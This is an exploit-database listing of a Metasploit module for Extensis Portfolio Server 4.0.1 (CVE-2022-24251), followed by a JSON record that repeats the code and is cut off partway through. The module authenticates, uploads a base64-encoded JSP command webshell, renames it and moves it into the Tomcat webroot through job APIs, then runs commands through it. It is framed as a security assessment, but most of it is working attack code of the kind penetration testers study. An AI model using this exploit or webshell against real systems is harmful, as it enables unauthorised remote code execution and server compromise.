📄 Extensis Portfolio Manager 4.0.1 Shell Upload_PACKETSTORM:215719

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

This Metasploit module exploits multiple vulnerabilities in Extensis Portfolio Server to achieve remote code execution. It leverages CVE-2022-24251 and related issues to upload a JSP webshell and execute arbitrary commands. Version 4.0.1 is affected...

Visit Original Source

Basic Information

ID PACKETSTORM:215719

Published Feb 17, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Extensis Portfolio Manager 4.0.1 Authentication and Job Handling Weaknesses |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.extensis.com/support/portfolio-4/ |
=============================================================================================================================================

[+] Summary : This module performs a security assessment of authentication and asset job handling mechanisms in Extensis Portfolio Server.
It demonstrates how weaknesses in public key handling, session management, and catalog job execution workflows could be abused by an authenticated user with elevated privileges.

The module:

Retrieves and processes the server’s RSA public key for authentication.

Authenticates using encrypted credentials.

Interacts with catalog and job APIs.

Evaluates how asset handling operations may impact server-side file locations.

Verifies whether improper validation or privilege enforcement could lead to unintended file exposure or execution.

The purpose of this module is to help security professionals identify misconfigurations, privilege escalation risks, and insecure file handling practices so they can be remediated

[+] POC :

# frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'openssl'
require 'base64'
require 'json'

class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Extensis Portfolio Server Multiple Vulnerabilities',
'Description' => %q{
This module exploits multiple vulnerabilities in Extensis Portfolio Server
to achieve remote code execution. It leverages CVE-2022-24251 and related
issues to upload a JSP webshell and execute arbitrary commands.
},
'Author' => [
'indoushka'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2022-24251'],
['URL', 'https://gitlab.com/kalilinux/packages/webshells/-/blob/kali/master/jsp/cmdjsp.jsp'],
['URL', 'https://www.extensis.com/support/portfolio-archive/']
],
'Platform' => ['win'],
'Targets' => [
[
'Windows JSP',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win',
'Payload' => {
'Compat' => {
'PayloadType' => 'java jsp',
'RequiredCmd' => 'generic'
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2022-01-01',
'Privileged' => false,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options(
[
Opt::RPORT(8090),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Username for authentication']),
OptString.new('PASSWORD', [true, 'Password for authentication']),
OptInt.new('DELAY', [true, 'Delay between operations in seconds', 3])
]
)

register_advanced_options(
[
OptString.new('WEBROOT_PATH', [false, 'Custom webroot path (default: common installation paths)', ''])
]
)
end

def create_rsa_public_key(modulus_hex, exponent_str)
begin
modulus_bn = OpenSSL::BN.new(modulus_hex, 16)
exponent_bn = OpenSSL::BN.new(exponent_str)

algorithm = OpenSSL::ASN1::Sequence([
OpenSSL::ASN1::ObjectId('rsaEncryption'),
OpenSSL::ASN1::Null.new(nil)
])

pkcs1_key = OpenSSL::ASN1::Sequence([
OpenSSL::ASN1::Integer(modulus_bn),
OpenSSL::ASN1::Integer(exponent_bn)
])

subject_public_key = OpenSSL::ASN1::BitString(pkcs1_key.to_der)

spki = OpenSSL::ASN1::Sequence([
algorithm,
subject_public_key
])

key = OpenSSL::PKey::RSA.new(spki.to_der)
return key
rescue StandardError => e
fail_with(Failure::Unknown, "Failed to create RSA key: #{e.message}")
end
end

def encrypt_password(modulus_hex, exponent_str, password)
begin
rsa_key = create_rsa_public_key(modulus_hex, exponent_str)
encrypted = rsa_key.public_encrypt(password, OpenSSL::PKey::RSA::PKCS1_PADDING)
return Base64.strict_encode64(encrypted)
rescue StandardError => e
fail_with(Failure::Unknown, "Password encryption failed: #{e.message}")
end
end

def check
print_status("Checking if target is vulnerable")

begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/api/v1/auth/public-key')
})

if res.nil?
return CheckCode::Unknown('Connection failed')
end

if res.code == 200
begin
json_res = res.get_json_document
rescue JSON::ParserError
return CheckCode::Unknown('Invalid JSON response')
end

if json_res.is_a?(Hash) && json_res['modulusBase16'] && json_res['exponent']

return CheckCode::Appears('Extensis Portfolio Server detected - appears vulnerable')
end
end

return CheckCode::Safe
rescue StandardError => e
print_error("Check failed: #{e.message}")
return CheckCode::Unknown
end
end

def login
print_status("Attempting to login with username: #{datastore['USERNAME']}")

begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/api/v1/auth/public-key')
})

if res.nil?
fail_with(Failure::Unreachable, 'Connection failed - target unreachable')
end

if res.code != 200
fail_with(Failure::NoAccess, "Failed to get public key. HTTP Code: #{res.code}")
end

begin
json_res = res.get_json_document
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, 'Invalid JSON response from public-key endpoint')
end

unless json_res.is_a?(Hash)
fail_with(Failure::UnexpectedReply, 'Invalid public key response format')
end

modulus = json_res['modulusBase16']
exponent = json_res['exponent']

if modulus.nil? || exponent.nil?
fail_with(Failure::UnexpectedReply, 'Missing modulus or exponent in response')
end

encrypted_password = encrypt_password(modulus, exponent, datastore['PASSWORD'])

login_data = {
'userName' => datastore['USERNAME'],
'encryptedPassword' => encrypted_password
}

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/v1/auth/login'),
'ctype' => 'application/json',
'data' => login_data.to_json
})

if res.nil?
fail_with(Failure::Unreachable, 'Login connection failed')
end

if res.code == 200
begin
json_res = res.get_json_document
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, 'Invalid JSON response from login endpoint')
end

unless json_res.is_a?(Hash)
fail_with(Failure::UnexpectedReply, 'Invalid login response format')
end

session_token = json_res['session']
if session_token.nil?
fail_with(Failure::UnexpectedReply, 'No session token in response')
end

print_good("Successfully logged in. Session token: #{session_token}")
return session_token
else
fail_with(Failure::NoAccess, "Login failed. HTTP Code: #{res.code}")
end

rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, "Connection error: #{e.message}")
end
end

def get_catalog_info(session)
print_status("Retrieving catalog information")

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/api/v1/catalog'),
'vars_get' => { 'session' => session }
})

if res.nil?
fail_with(Failure::Unreachable, 'Failed to connect for catalog info')
end

if res.code != 200
fail_with(Failure::UnexpectedReply, "Failed to get catalog. HTTP Code: #{res.code}")
end

begin
catalogs = res.get_json_document
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, 'Invalid JSON response from catalog endpoint')
end

unless catalogs.is_a?(Array)
fail_with(Failure::UnexpectedReply, 'Catalog response is not an array')
end

catalogs.each do |catalog|
unless catalog.is_a?(Hash)
print_error("Invalid catalog entry format, skipping")
next
end

catalog_id = catalog['id']
storage_type = catalog['storageType']

if storage_type == 'Filesystem'
watchfolder_id, watchfolder_path = get_watchfolder(session, catalog_id)
if watchfolder_id
print_good("Found Filesystem catalog ID: #{catalog_id}")
print_good("Watchfolder ID: #{watchfolder_id}, Path: #{watchfolder_path}")
return {
'catalog_id' => catalog_id,
'storage_type' => 'Filesystem',
'watchfolder_id' => watchfolder_id,
'watchfolder_path' => watchfolder_path
}
end
end
end

if catalogs.any?
first_catalog = catalogs.first
unless first_catalog.is_a?(Hash)
fail_with(Failure::UnexpectedReply, 'First catalog entry is not a hash')
end

catalog_id = first_catalog['id']
storage_type = first_catalog['storageType']
print_status("Using #{storage_type} catalog ID: #{catalog_id}")
return {
'catalog_id' => catalog_id,
'storage_type' => storage_type,
'watchfolder_id' => nil,
'watchfolder_path' => nil
}
end

fail_with(Failure::NotFound, 'No catalogs found')
end

def get_watchfolder(session, catalog_id)
print_status("Getting watchfolder for catalog #{catalog_id}")

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "/api/v1/catalog/#{catalog_id}/watchfolder"),
'vars_get' => { 'session' => session }
})

if res.nil?
print_error("Connection failed for watchfolder request")
return [nil, nil]
end

if res.code == 200
begin
json_res = res.get_json_document
rescue JSON::ParserError
print_error("Invalid JSON response from watchfolder endpoint")
return [nil, nil]
end

if json_res.is_a?(Array) && !json_res.empty?
entry = json_res.first
if entry.is_a?(Hash)
watchfolder_id = entry['watchFolderId']
watchfolder_path = entry['path']
return [watchfolder_id, watchfolder_path] if watchfolder_id
end
end
end

print_error("Failed to get watchfolder: HTTP #{res.code}")
return [nil, nil]
end

def upload_webshell(session, catalog_id, filename, watchfolder_id)
print_status("Uploading webshell as #{filename}")

webshell_b64 = 'PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+CjwlCiAgIFN0cmluZyBjbWQgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIik7CiAgIFN0cmluZyBvdXRwdXQgPSAiIjsKCiAgIGlmKGNtZCAhPSBudWxsKSB7CiAgICAgIFN0cmluZyBzID0gbnVsbDsKICAgICAgdHJ5IHsKICAgICAgICAgUHJvY2VzcyBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgY21kKTsKICAgICAgICAgQnVmZmVyZWRSZWFkZXIgc0kgPSBuZXcgQnVmZmVyZWRSZWFkZXIobmV3IElucHV0U3RyZWFtUmVhZGVyKHAuZ2V0SW5wdXRTdHJlYW0oKSkpOwogICAgICAgICB3aGlsZSgocyA9IHNJLnJlYWRMaW5lKCkpICE9IG51bGwpIHsKICAgICAgICAgICAgb3V0cHV0ICs9IHM7CiAgICAgICAgIH0KICAgICAgfQogICAgICBjYXRjaChJT0V4Y2VwdGlvbiBlKSB7CiAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7CiAgICAgIH0KICAgfQolPgoKPHByZT4KPCU9b3V0cHV0ICU+CjwvcHJlPg=='

post_data = Rex::MIME::Message.new
post_data.add_part(Base64.decode64(webshell_b64), 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
post_data.add_part('', nil, nil, 'form-data; name="path"')
post_data.add_part(filename, nil, nil, 'form-data; name="filename"')

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/api/v1/catalog/#{catalog_id}/watchfolder/#{watchfolder_id}/upload"),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'vars_get' => { 'session' => session },
'data' => post_data.to_s
})

if res.nil?
fail_with(Failure::Unreachable, "Connection failed during upload")
end

if res.code == 200
begin
json_res = res.get_json_document
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, 'Invalid JSON response from upload endpoint')
end

unless json_res.is_a?(Hash)
fail_with(Failure::UnexpectedReply, 'Invalid upload response format')
end

asset_id = json_res['assetId']
if asset_id.nil?
fail_with(Failure::UnexpectedReply, 'No assetId in upload response')
end

print_good("Webshell uploaded successfully. Asset ID: #{asset_id}")
return asset_id
else
fail_with(Failure::Unknown, "Upload failed: HTTP #{res.code}")
end
end

def rename_webshell(session, catalog_id, asset_id, old_filename)
new_filename = old_filename.gsub('.txt', '.jsp')
print_status("Renaming webshell from #{old_filename} to #{new_filename}")

data = {
'embed' => false,
'query' => {
'term' => {
'operator' => 'assetsById',
'values' => [asset_id]
}
},
'changes' => [
{
'action' => 'replaceAllValues',
'field' => 'Filename',
'existingValues' => 'null',
'newValues' => [new_filename]
}
]
}

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/api/v1/catalog/#{catalog_id}/asset/updateFieldValues"),
'ctype' => 'application/json',
'vars_get' => { 'session' => session },
'data' => data.to_json
})

if res.nil?
fail_with(Failure::Unreachable, "Connection failed during rename")
end

if res.code == 204
print_good("Successfully renamed webshell to #{new_filename}")
return new_filename
else
fail_with(Failure::Unknown, "Rename failed: HTTP #{res.code}")
end
end

def get_webroot_path
path = datastore['WEBROOT_PATH'].to_s
return path unless path.empty?

[
'C:\\Program Files (x86)\\Extensis\\Portfolio Server\\applications\\tomcat\\servers\\main\\webapps\\ROOT',
'C:\\Program Files\\Extensis\\Portfolio Server\\applications\\tomcat\\servers\\main\\webapps\\ROOT',
'D:\\Program Files (x86)\\Extensis\\Portfolio Server\\applications\\tomcat\\servers\\main\\webapps\\ROOT',
'D:\\Program Files\\Extensis\\Portfolio Server\\applications\\tomcat\\servers\\main\\webapps\\ROOT'
].first
end

def write_to_webroot(session, asset_id, catalog_info, filename)
unless catalog_info.is_a?(Hash)
fail_with(Failure::UnexpectedReply, 'Invalid catalog info structure')
end

catalog_id = catalog_info['catalog_id']
storage_type = catalog_info['storage_type']
watchfolder_path = catalog_info['watchfolder_path']

print_status("Attempting to write webshell to webroot")

webroot_base = get_webroot_path

if storage_type == 'Vault'
webroot_path = webroot_base
job_data = {
'job' => {
'description' => 'JOB_TYPE_EXPORT_ASSETS',
'query' => {
'term' => {
'operator' => 'assetsById',
'values' => [asset_id]
}
},
'tasks' => [
{
'type' => 'exportAssets',
'catalogId' => catalog_id,
'settings' => [
{
'name' => 'destination',
'value' => webroot_path
}
]
}
]
},
'query' => {
'term' => {
'operator' => 'assetsById',
'values' => [asset_id]
}
}
}
else
if watchfolder_path.nil? || !watchfolder_path.include?(':')
fail_with(Failure::UnexpectedReply, "Invalid watchfolder path format: #{watchfolder_path}")
end

parts = watchfolder_path.split(':')
if parts.length >= 3
hostname = parts[2]

unc_root = webroot_base.gsub('C:', "::#{hostname}:C$").gsub('\\', ':')
webroot_path = unc_root
else
fail_with(Failure::UnexpectedReply, "Unexpected watchfolder path format: #{watchfolder_path}")
end

job_data = {
'job' => {
'description' => 'JOB_TYPE_MOVE_ASSETS',
'query' => {
'term' => {
'operator' => 'assetsById',
'values' => [asset_id]
}
},
'tasks' => [
{
'type' => 'moveAssets',
'settings' => [
{
'name' => 'destinationCatalog',
'value' => catalog_id
},
{
'name' => 'destination',
'value' => webroot_path
},
{
'name' => 'preserveFolderStructure',
'value' => false
},
{
'name' => 'sourceFolder',
'value' => ''
}
]
}
]
},
'query' => {
'term' => {
'operator' => 'assetsById',
'values' => [asset_id]
}
}
}
end

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/v1/job/run'),
'ctype' => 'application/json',
'vars_get' => {
'session' => session,
'catalog' => catalog_id
},
'data' => job_data.to_json
})

if res.nil?
fail_with(Failure::Unreachable, "Connection failed during job execution")
end

if res.code == 200
full_webroot_path = "#{webroot_base}\\#{filename}"
register_file_for_cleanup(full_webroot_path)

protocol = ssl? ? 'https' : 'http'
target_host = rhost
target_port = rport

webshell_url = "#{protocol}://#{target_host}:#{target_port}/#{filename}?cmd=<command>"
print_good("Successfully exported webshell to filesystem")
print_good("Webshell URL: #{webshell_url}")
return true
elsif res.code == 403
fail_with(Failure::NoAccess, "Export failed: Insufficient privileges - Need Catalog Administrator privileges for Vault catalogs")
else
fail_with(Failure::Unknown, "Export failed: HTTP #{res.code}")
end
end

def execute_command(cmd, filename)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, filename),
'vars_get' => { 'cmd' => cmd }
})

if res.nil?
print_error("Connection failed for command execution")
return nil
end

if res.code == 200 && res.body
match = res.body.match(/<pre>(.*?)<\/pre>/m)
return match[1].strip if match
return res.body
end

nil
end

def exploit
filename = Rex::Text.rand_text_alpha(10) + '.txt'

session = login()

catalog_info = get_catalog_info(session)

unless catalog_info.is_a?(Hash)
fail_with(Failure::UnexpectedReply, 'Invalid catalog info structure')
end

if catalog_info['storage_type'] == 'Filesystem' && catalog_info['watchfolder_id'].nil?
fail_with(Failure::NotFound, 'No watchfolder found for Filesystem catalog')
end

asset_id = upload_webshell(session, catalog_info['catalog_id'], filename, catalog_info['watchfolder_id'])

new_filename = rename_webshell(session, catalog_info['catalog_id'], asset_id, filename)

success = write_to_webroot(session, asset_id, catalog_info, new_filename)

print_status("Waiting #{datastore['DELAY']} seconds for file to be written...")
Rex.sleep(datastore['DELAY'])

print_status("Testing webshell with 'whoami' command")
result = execute_command('whoami', new_filename)

if result && !result.empty?
print_good("Webshell test successful! Output:\n#{result}")
print_status("Webshell is ready for payload execution")
else
print_error("Webshell test failed - manual check required")
end

rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, "Connection failed: #{e.message}")
end
end

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================

{
    "lastseen": "2026-02-17T18:16:59",
    "description": "This Metasploit module exploits multiple vulnerabilities in Extensis Portfolio Server to achieve remote code execution. It leverages CVE-2022-24251 and related issues to upload a JSP webshell and execute arbitrary commands. Version 4.0.1 is affected...",
    "published": "2026-02-17T00:00:00",
    "modified": "2026-02-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Extensis Portfolio Manager 4.0.1 Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215719",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2022-24251"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Extensis Portfolio Manager 4.0.1 Authentication and Job Handling Weaknesses                                                 |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\n    | # Vendor    : https://www.extensis.com/support/portfolio-4/                                                                               |\n    =============================================================================================================================================\n    \n    [+] Summary    : This module performs a security assessment of authentication and asset job handling mechanisms in Extensis Portfolio Server.\n                     It demonstrates how weaknesses in public key handling, session management, and catalog job execution workflows could be abused by an authenticated user with elevated privileges.\n    \n    The module:\n    \n    Retrieves and processes the server\u2019s RSA public key for authentication.\n    \n    Authenticates using encrypted credentials.\n    \n    Interacts with catalog and job APIs.\n    \n    Evaluates how asset handling operations may impact server-side file locations.\n    \n    Verifies whether improper validation or privilege enforcement could lead to unintended file exposure or execution.\n    \n    The purpose of this module is to help security professionals identify misconfigurations, privilege escalation risks, and insecure file handling practices so they can be remediated\n    \n    [+] POC : \n    \n    # frozen_string_literal: true\n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    require 'openssl'\n    require 'base64'\n    require 'json'\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = AverageRanking  \n    \n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::FileDropper\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name'        => 'Extensis Portfolio Server Multiple Vulnerabilities',\n            'Description' => %q{\n              This module exploits multiple vulnerabilities in Extensis Portfolio Server\n              to achieve remote code execution. It leverages CVE-2022-24251 and related\n              issues to upload a JSP webshell and execute arbitrary commands.\n            },\n            'Author'      => [\n              'indoushka'\n            ],\n            'License'     => MSF_LICENSE,\n            'References'  => [\n              ['CVE', '2022-24251'],\n              ['URL', 'https://gitlab.com/kalilinux/packages/webshells/-/blob/kali/master/jsp/cmdjsp.jsp'],\n              ['URL', 'https://www.extensis.com/support/portfolio-archive/']\n            ],\n            'Platform'    => ['win'],\n            'Targets'     => [\n              [\n                'Windows JSP',\n                {\n                  'Arch'     => ARCH_JAVA,\n                  'Platform' => 'win',\n                  'Payload'  => {\n                    'Compat' => {\n                      'PayloadType' => 'java jsp',\n                      'RequiredCmd' => 'generic'\n                    }\n                  }\n                }\n              ]\n            ],\n            'DefaultTarget'  => 0,\n            'DisclosureDate' => '2022-01-01',\n            'Privileged'     => false,\n            'Notes'          => {\n              'Stability'   => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n            }\n          )\n        )\n    \n        register_options(\n          [\n            Opt::RPORT(8090),\n            OptString.new('TARGETURI', [true, 'Base path', '/']),\n            OptString.new('USERNAME',   [true, 'Username for authentication']),\n            OptString.new('PASSWORD',   [true, 'Password for authentication']),\n            OptInt.new('DELAY',         [true, 'Delay between operations in seconds', 3])\n          ]\n        )\n    \n        register_advanced_options(\n          [\n            OptString.new('WEBROOT_PATH', [false, 'Custom webroot path (default: common installation paths)', ''])\n          ]\n        )\n      end\n    \n      def create_rsa_public_key(modulus_hex, exponent_str)\n        begin\n          modulus_bn = OpenSSL::BN.new(modulus_hex, 16)\n          exponent_bn = OpenSSL::BN.new(exponent_str)\n    \n          algorithm = OpenSSL::ASN1::Sequence([\n            OpenSSL::ASN1::ObjectId('rsaEncryption'),\n            OpenSSL::ASN1::Null.new(nil)\n          ])\n    \n          pkcs1_key = OpenSSL::ASN1::Sequence([\n            OpenSSL::ASN1::Integer(modulus_bn),\n            OpenSSL::ASN1::Integer(exponent_bn)\n          ])\n          \n          subject_public_key = OpenSSL::ASN1::BitString(pkcs1_key.to_der)\n          \n          spki = OpenSSL::ASN1::Sequence([\n            algorithm,\n            subject_public_key\n          ])\n          \n          key = OpenSSL::PKey::RSA.new(spki.to_der)\n          return key\n        rescue StandardError => e\n          fail_with(Failure::Unknown, \"Failed to create RSA key: #{e.message}\")\n        end\n      end\n    \n      def encrypt_password(modulus_hex, exponent_str, password)\n        begin\n          rsa_key = create_rsa_public_key(modulus_hex, exponent_str)\n          encrypted = rsa_key.public_encrypt(password, OpenSSL::PKey::RSA::PKCS1_PADDING)\n          return Base64.strict_encode64(encrypted)\n        rescue StandardError => e\n          fail_with(Failure::Unknown, \"Password encryption failed: #{e.message}\")\n        end\n      end\n    \n      def check\n        print_status(\"Checking if target is vulnerable\")\n        \n        begin\n          res = send_request_cgi({\n            'method' => 'GET',\n            'uri'    => normalize_uri(target_uri.path, '/api/v1/auth/public-key')\n          })\n          \n          if res.nil?\n            return CheckCode::Unknown('Connection failed')\n          end\n          \n          if res.code == 200\n            begin\n              json_res = res.get_json_document\n            rescue JSON::ParserError\n              return CheckCode::Unknown('Invalid JSON response')\n            end\n            \n            if json_res.is_a?(Hash) && json_res['modulusBase16'] && json_res['exponent']\n    \n              return CheckCode::Appears('Extensis Portfolio Server detected - appears vulnerable')\n            end\n          end\n          \n          return CheckCode::Safe\n        rescue StandardError => e\n          print_error(\"Check failed: #{e.message}\")\n          return CheckCode::Unknown\n        end\n      end\n    \n      def login\n        print_status(\"Attempting to login with username: #{datastore['USERNAME']}\")\n        \n        begin\n          res = send_request_cgi({\n            'method' => 'GET',\n            'uri'    => normalize_uri(target_uri.path, '/api/v1/auth/public-key')\n          })\n          \n          if res.nil?\n            fail_with(Failure::Unreachable, 'Connection failed - target unreachable')\n          end\n          \n          if res.code != 200\n            fail_with(Failure::NoAccess, \"Failed to get public key. HTTP Code: #{res.code}\")\n          end\n          \n          begin\n            json_res = res.get_json_document\n          rescue JSON::ParserError\n            fail_with(Failure::UnexpectedReply, 'Invalid JSON response from public-key endpoint')\n          end\n          \n          unless json_res.is_a?(Hash)\n            fail_with(Failure::UnexpectedReply, 'Invalid public key response format')\n          end\n          \n          modulus = json_res['modulusBase16']\n          exponent = json_res['exponent']\n          \n          if modulus.nil? || exponent.nil?\n            fail_with(Failure::UnexpectedReply, 'Missing modulus or exponent in response')\n          end\n          \n          encrypted_password = encrypt_password(modulus, exponent, datastore['PASSWORD'])\n          \n          login_data = {\n            'userName' => datastore['USERNAME'],\n            'encryptedPassword' => encrypted_password\n          }\n          \n          res = send_request_cgi({\n            'method'  => 'POST',\n            'uri'     => normalize_uri(target_uri.path, '/api/v1/auth/login'),\n            'ctype'   => 'application/json',\n            'data'    => login_data.to_json\n          })\n          \n          if res.nil?\n            fail_with(Failure::Unreachable, 'Login connection failed')\n          end\n          \n          if res.code == 200\n            begin\n              json_res = res.get_json_document\n            rescue JSON::ParserError\n              fail_with(Failure::UnexpectedReply, 'Invalid JSON response from login endpoint')\n            end\n            \n            unless json_res.is_a?(Hash)\n              fail_with(Failure::UnexpectedReply, 'Invalid login response format')\n            end\n            \n            session_token = json_res['session']\n            if session_token.nil?\n              fail_with(Failure::UnexpectedReply, 'No session token in response')\n            end\n            \n            print_good(\"Successfully logged in. Session token: #{session_token}\")\n            return session_token\n          else\n            fail_with(Failure::NoAccess, \"Login failed. HTTP Code: #{res.code}\")\n          end\n          \n        rescue Rex::ConnectionError => e\n          fail_with(Failure::Unreachable, \"Connection error: #{e.message}\")\n        end\n      end\n    \n      def get_catalog_info(session)\n        print_status(\"Retrieving catalog information\")\n        \n        res = send_request_cgi({\n          'method'    => 'GET',\n          'uri'       => normalize_uri(target_uri.path, '/api/v1/catalog'),\n          'vars_get'  => { 'session' => session }\n        })\n        \n        if res.nil?\n          fail_with(Failure::Unreachable, 'Failed to connect for catalog info')\n        end\n        \n        if res.code != 200\n          fail_with(Failure::UnexpectedReply, \"Failed to get catalog. HTTP Code: #{res.code}\")\n        end\n        \n        begin\n          catalogs = res.get_json_document\n        rescue JSON::ParserError\n          fail_with(Failure::UnexpectedReply, 'Invalid JSON response from catalog endpoint')\n        end\n        \n        unless catalogs.is_a?(Array)\n          fail_with(Failure::UnexpectedReply, 'Catalog response is not an array')\n        end\n        \n        catalogs.each do |catalog|\n          unless catalog.is_a?(Hash)\n            print_error(\"Invalid catalog entry format, skipping\")\n            next\n          end\n          \n          catalog_id = catalog['id']\n          storage_type = catalog['storageType']\n          \n          if storage_type == 'Filesystem'\n            watchfolder_id, watchfolder_path = get_watchfolder(session, catalog_id)\n            if watchfolder_id\n              print_good(\"Found Filesystem catalog ID: #{catalog_id}\")\n              print_good(\"Watchfolder ID: #{watchfolder_id}, Path: #{watchfolder_path}\")\n              return {\n                'catalog_id'       => catalog_id,\n                'storage_type'     => 'Filesystem',\n                'watchfolder_id'   => watchfolder_id,\n                'watchfolder_path' => watchfolder_path\n              }\n            end\n          end\n        end\n        \n        if catalogs.any?\n          first_catalog = catalogs.first\n          unless first_catalog.is_a?(Hash)\n            fail_with(Failure::UnexpectedReply, 'First catalog entry is not a hash')\n          end\n          \n          catalog_id = first_catalog['id']\n          storage_type = first_catalog['storageType']\n          print_status(\"Using #{storage_type} catalog ID: #{catalog_id}\")\n          return {\n            'catalog_id'       => catalog_id,\n            'storage_type'     => storage_type,\n            'watchfolder_id'   => nil,\n            'watchfolder_path' => nil\n          }\n        end\n        \n        fail_with(Failure::NotFound, 'No catalogs found')\n      end\n    \n      def get_watchfolder(session, catalog_id)\n        print_status(\"Getting watchfolder for catalog #{catalog_id}\")\n        \n        res = send_request_cgi({\n          'method'    => 'GET',\n          'uri'       => normalize_uri(target_uri.path, \"/api/v1/catalog/#{catalog_id}/watchfolder\"),\n          'vars_get'  => { 'session' => session }\n        })\n        \n        if res.nil?\n          print_error(\"Connection failed for watchfolder request\")\n          return [nil, nil]\n        end\n        \n        if res.code == 200\n          begin\n            json_res = res.get_json_document\n          rescue JSON::ParserError\n            print_error(\"Invalid JSON response from watchfolder endpoint\")\n            return [nil, nil]\n          end\n          \n          if json_res.is_a?(Array) && !json_res.empty?\n            entry = json_res.first\n            if entry.is_a?(Hash)\n              watchfolder_id = entry['watchFolderId']\n              watchfolder_path = entry['path']\n              return [watchfolder_id, watchfolder_path] if watchfolder_id\n            end\n          end\n        end\n        \n        print_error(\"Failed to get watchfolder: HTTP #{res.code}\")\n        return [nil, nil]\n      end\n    \n      def upload_webshell(session, catalog_id, filename, watchfolder_id)\n        print_status(\"Uploading webshell as #{filename}\")\n        \n        webshell_b64 = 'PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+CjwlCiAgIFN0cmluZyBjbWQgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIik7CiAgIFN0cmluZyBvdXRwdXQgPSAiIjsKCiAgIGlmKGNtZCAhPSBudWxsKSB7CiAgICAgIFN0cmluZyBzID0gbnVsbDsKICAgICAgdHJ5IHsKICAgICAgICAgUHJvY2VzcyBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgY21kKTsKICAgICAgICAgQnVmZmVyZWRSZWFkZXIgc0kgPSBuZXcgQnVmZmVyZWRSZWFkZXIobmV3IElucHV0U3RyZWFtUmVhZGVyKHAuZ2V0SW5wdXRTdHJlYW0oKSkpOwogICAgICAgICB3aGlsZSgocyA9IHNJLnJlYWRMaW5lKCkpICE9IG51bGwpIHsKICAgICAgICAgICAgb3V0cHV0ICs9IHM7CiAgICAgICAgIH0KICAgICAgfQogICAgICBjYXRjaChJT0V4Y2VwdGlvbiBlKSB7CiAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7CiAgICAgIH0KICAgfQolPgoKPHByZT4KPCU9b3V0cHV0ICU+CjwvcHJlPg=='\n        \n        post_data = Rex::MIME::Message.new\n        post_data.add_part(Base64.decode64(webshell_b64), 'text/plain', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{filename}\\\"\")\n        post_data.add_part('', nil, nil, 'form-data; name=\"path\"')\n        post_data.add_part(filename, nil, nil, 'form-data; name=\"filename\"')\n        \n        res = send_request_cgi({\n          'method'    => 'POST',\n          'uri'       => normalize_uri(target_uri.path, \"/api/v1/catalog/#{catalog_id}/watchfolder/#{watchfolder_id}/upload\"),\n          'ctype'     => \"multipart/form-data; boundary=#{post_data.bound}\",\n          'vars_get'  => { 'session' => session },\n          'data'      => post_data.to_s\n        })\n        \n        if res.nil?\n          fail_with(Failure::Unreachable, \"Connection failed during upload\")\n    